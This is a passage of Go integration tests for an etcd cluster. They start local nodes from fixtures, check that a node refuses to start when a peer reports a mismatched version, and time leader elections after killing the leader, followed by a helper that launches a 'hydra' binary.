	nodes := []string{"node0", "node2"}
	for i, node := range nodes {
		nodepath := filepath.Join(path, node)
		fixturepath, _ := filepath.Abs(filepath.Join("../fixtures/v1.cluster/", node))
		fmt.Println("FIXPATH =", fixturepath)
		fmt.Println("NODEPATH =", nodepath)
		os.MkdirAll(filepath.Dir(nodepath), 0777)

		// Copy over fixture files.
		c := exec.Command("cp", "-rf", fixturepath, nodepath)
		if out, err := c.CombinedOutput(); err != nil {
			fmt.Println(">>>>>>\n", string(out), "<<<<<<")
			panic("Fixture initialization error:" + err.Error())
		}

		procAttr := new(os.ProcAttr)
		procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}

		args := []string{"etcd", fmt.Sprintf("-data-dir=%s", nodepath)}
		args = append(args, "-addr", fmt.Sprintf("127.0.0.1:%d", 4001+i))
		args = append(args, "-peer-addr", fmt.Sprintf("127.0.0.1:%d", 7001+i))
		args = append(args, "-name", node)
		process, err := os.StartProcess(EtcdBinPath, args, procAttr)
		if err != nil {
			t.Fatal("start process failed:" + err.Error())
		}
		defer process.Kill()

		time.Sleep(time.Second)
	}

	// Ensure deleted message is removed.
	resp, err := tests.Get("http://localhost:4001/v2/keys/message")
	body := tests.ReadBody(resp)
	assert.Nil(t, err, "")
	assert.Equal(t, resp.StatusCode, http.StatusNotFound)
	assert.Equal(t, string(body), `{"errorCode":100,"message":"Key not found","cause":"/message","index":11}`+"\n")

	// Ensure TTL'd message is removed.
	resp, err = tests.Get("http://localhost:4001/v2/keys/foo")
	body = tests.ReadBody(resp)
	assert.Nil(t, err, "")
	assert.Equal(t, resp.StatusCode, 200, "")
	assert.Equal(t, string(body), `{"action":"get","node":{"key":"/foo","value":"one","modifiedIndex":9,"createdIndex":9}}`)
}
// Ensure that etcd does not come up if the internal raft versions do not match.
func TestInternalVersion(t *testing.T) {
	var mu sync.Mutex
	checkedVersion := false
	testMux := http.NewServeMux()
	testMux.HandleFunc("/version", func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprintln(w, "This is not a version number")
		mu.Lock()
		defer mu.Unlock()
		checkedVersion = true
	})
	testMux.HandleFunc("/join", func(w http.ResponseWriter, r *http.Request) {
		t.Fatal("should not attempt to join!")
	})

	ts := httptest.NewServer(testMux)
	defer ts.Close()

	fakeURL, _ := url.Parse(ts.URL)

	procAttr := new(os.ProcAttr)
	procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}
	args := []string{"etcd", "-name=node1", "-f", "-data-dir=/tmp/node1", "-peers=" + fakeURL.Host}

	process, err := os.StartProcess(EtcdBinPath, args, procAttr)
	if err != nil {
		t.Fatal("start process failed:" + err.Error())
	}
	time.Sleep(time.Second)
	process.Kill()

	_, err = http.Get("http://127.0.0.1:4001")
	if err == nil {
		t.Fatal("etcd node should not be up")
	}

	mu.Lock()
	defer mu.Unlock()
	if !checkedVersion {
		t.Fatal("etcd did not check the version")
	}
}
// This test kills the current leader and waits for the etcd cluster to elect
// a new leader, 200 times.
// It prints out each election time and the average election time.
func TestKillLeader(t *testing.T) {
	procAttr := new(os.ProcAttr)
	procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}

	clusterSize := 5
	argGroup, etcds, err := createCluster(clusterSize, procAttr)
	if err != nil {
		t.Fatal("cannot create cluster")
	}
	defer destroyCluster(etcds)

	leaderChan := make(chan string, 1)

	time.Sleep(time.Second)

	go leaderMonitor(clusterSize, 1, leaderChan)

	var totalTime time.Duration

	leader := "0.0.0.0:7001"

	for i := 0; i < 200; i++ {
		port, _ := strconv.Atoi(strings.Split(leader, ":")[1])
		num := port - 7001
		fmt.Println("kill server ", num)
		etcds[num].Kill()
		etcds[num].Release()

		start := time.Now()
		for {
			newLeader := <-leaderChan
			if newLeader != leader {
				leader = newLeader
				break
			}
		}
		take := time.Now().Sub(start)

		totalTime += take
		avgTime := totalTime / (time.Duration)(i+1)

		fmt.Println("Leader election time is ", take, "with election timeout", ELECTIONTIMTOUT)
		fmt.Println("Leader election time average is", avgTime, "with election timeout", ELECTIONTIMTOUT)
		etcds[num], err = os.StartProcess("etcd", argGroup[num], procAttr)
	}
}
func RunHydraInStandaloneAndReturnProcess(args []string) *os.Process {
	procAttr := new(os.ProcAttr)
	procAttr.Files = []*os.File{nil, os.Stdout, os.Stderr}

	dataDirExists, err := existsPath(DATA_DIR_PATH)
	if err == nil && dataDirExists {
		os.RemoveAll(DATA_DIR_PATH)
	}

	args = append([]string{"hydra", "-f"}, args...)
	process, err := os.StartProcess(HydraBinPath, args, procAttr)
	if err != nil {
		panic("start process failed:" + err.Error())
	}
	return process
}